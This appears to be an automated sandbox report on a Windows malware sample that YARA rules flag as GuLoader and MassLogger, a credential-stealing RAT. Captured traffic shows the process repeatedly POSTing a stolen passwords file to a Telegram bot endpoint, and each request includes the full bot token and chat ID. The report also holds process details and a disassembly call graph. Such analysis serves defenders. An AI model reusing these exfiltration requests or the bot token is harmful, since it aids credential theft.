                                                                                                        2025-01-11 06:39:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 39 66 33 36 66 66 36 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31f9f36ff63cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:39:57 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:39:57 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:39:57 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 35 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43964,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577597,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.449999149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:59 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3211933dfd44
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-11 06:39:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 31 39 33 33 64 66 64 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3211933dfd44Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:39:59 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:39:59 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:39:59 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 35 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43965,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577599,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.450014149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:40:05 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3257f8ac7e6a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-11 06:40:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 37 66 38 61 63 37 65 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3257f8ac7e6aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:40:05 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:40:05 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:40:05 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 36 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43966,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577605,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.450016149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:40:11 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3296d7c0aa3c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-11 06:40:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 36 64 37 63 30 61 61 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3296d7c0aa3cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:40:11 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:40:11 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:40:11 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 36 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43967,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577611,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.450018149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:40:17 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32dd306f6d66
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:40:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 64 33 30 36 66 36 64 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32dd306f6d66Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:40:17 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:40:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:40:17 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 36 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43968,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577617,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.450021149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:40:27 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33301687c692
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:40:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 30 31 36 38 37 63 36 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33301687c692Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:40:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:40:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:40:28 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 36 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43969,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577628,"document":{"file_n


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:01:38:18
                                                                                                        Start date:11/01/2025
                                                                                                        Path:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\c7WJL1gt32.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'017'781 bytes
                                                                                                        MD5 hash:7549EE46B6E4391BB5D33788FB901E8D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2418431968.00000000050B4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:01:39:30
                                                                                                        Start date:11/01/2025
                                                                                                        Path:C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\c7WJL1gt32.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'017'781 bytes
                                                                                                        MD5 hash:7549EE46B6E4391BB5D33788FB901E8D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:20.4%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:20.4%
                                                                                                          Total number of Nodes:1564
                                                                                                          Total number of Limit Nodes:38
                                                                                                          execution_graph 4128 401941 4129 401943 4128->4129 4134 402c41 4129->4134 4135 402c4d 4134->4135 4180 40640a 4135->4180 4138 401948 4140 405afa 4138->4140 4222 405dc5 4140->4222 4143 405b22 DeleteFileW 4145 401951 4143->4145 4144 405b39 4146 405c64 4144->4146 4236 4063e8 lstrcpynW 4144->4236 4146->4145 4265 40672b FindFirstFileW 4146->4265 4148 405b5f 4149 405b72 4148->4149 4150 405b65 lstrcatW 4148->4150 4237 405d09 lstrlenW 4149->4237 4151 405b78 4150->4151 4155 405b88 lstrcatW 4151->4155 4156 405b7e 4151->4156 4158 405b93 lstrlenW FindFirstFileW 4155->4158 4156->4155 4156->4158 4157 405c82 4268 405cbd lstrlenW CharPrevW 4157->4268 4159 405c59 4158->4159 4169 405bb5 4158->4169 4159->4146 4162 405c3c FindNextFileW 4166 405c52 FindClose 4162->4166 4162->4169 4163 405ab2 5 API calls 4165 405c94 4163->4165 4167 405c98 4165->4167 4168 405cae 4165->4168 4166->4159 4167->4145 4172 405450 24 API calls 4167->4172 4171 405450 24 API calls 4168->4171 4169->4162 4173 405afa 60 API calls 4169->4173 4175 405450 24 API calls 4169->4175 4241 4063e8 lstrcpynW 4169->4241 4242 405ab2 4169->4242 4250 405450 4169->4250 4261 4061ae MoveFileExW 4169->4261 4171->4145 4174 405ca5 4172->4174 4173->4169 4176 4061ae 36 API calls 4174->4176 4175->4162 4178 405cac 4176->4178 4178->4145 4194 406417 4180->4194 4181 406662 4182 402c6e 4181->4182 4213 4063e8 lstrcpynW 4181->4213 4182->4138 4197 40667c 4182->4197 4184 406630 lstrlenW 4184->4194 4185 40640a 10 API calls 4185->4184 4188 406545 GetSystemDirectoryW 4188->4194 4190 406558 GetWindowsDirectoryW 4190->4194 4191 40667c 5 API calls 4191->4194 4192 40640a 10 API calls 4192->4194 4193 4065d3 lstrcatW 4193->4194 4194->4181 4194->4184 4194->4185 4194->4188 4194->4190 4194->4191 4194->4192 4194->4193 4195 40658c SHGetSpecialFolderLocation 4194->4195 4206 4062b6 4194->4206 4211 40632f wsprintfW 4194->4211 4212 4063e8 lstrcpynW 4194->4212 4195->4194 4196 4065a4 SHGetPathFromIDListW CoTaskMemFree 4195->4196 4196->4194 4198 406689 4197->4198 4200 4066f2 CharNextW 4198->4200 4203 4066ff 4198->4203 4204 4066de CharNextW 4198->4204 4205 4066ed CharNextW 4198->4205 4218 405cea 4198->4218 4199 406704 CharPrevW 4199->4203 4200->4198 4200->4203 4201 406725 4201->4138 4203->4199 4203->4201 4204->4198 4205->4200 4214 406255 4206->4214 4209 40631a 4209->4194 4210 4062ea RegQueryValueExW RegCloseKey 4210->4209 4211->4194 4212->4194 4213->4182 4215 406264 4214->4215 4216 40626d RegOpenKeyExW 4215->4216 4217 406268 4215->4217 4216->4217 4217->4209 4217->4210 4219 405cf0 4218->4219 4220 405d06 4219->4220 4221 405cf7 CharNextW 4219->4221 4220->4198 4221->4219 4271 4063e8 lstrcpynW 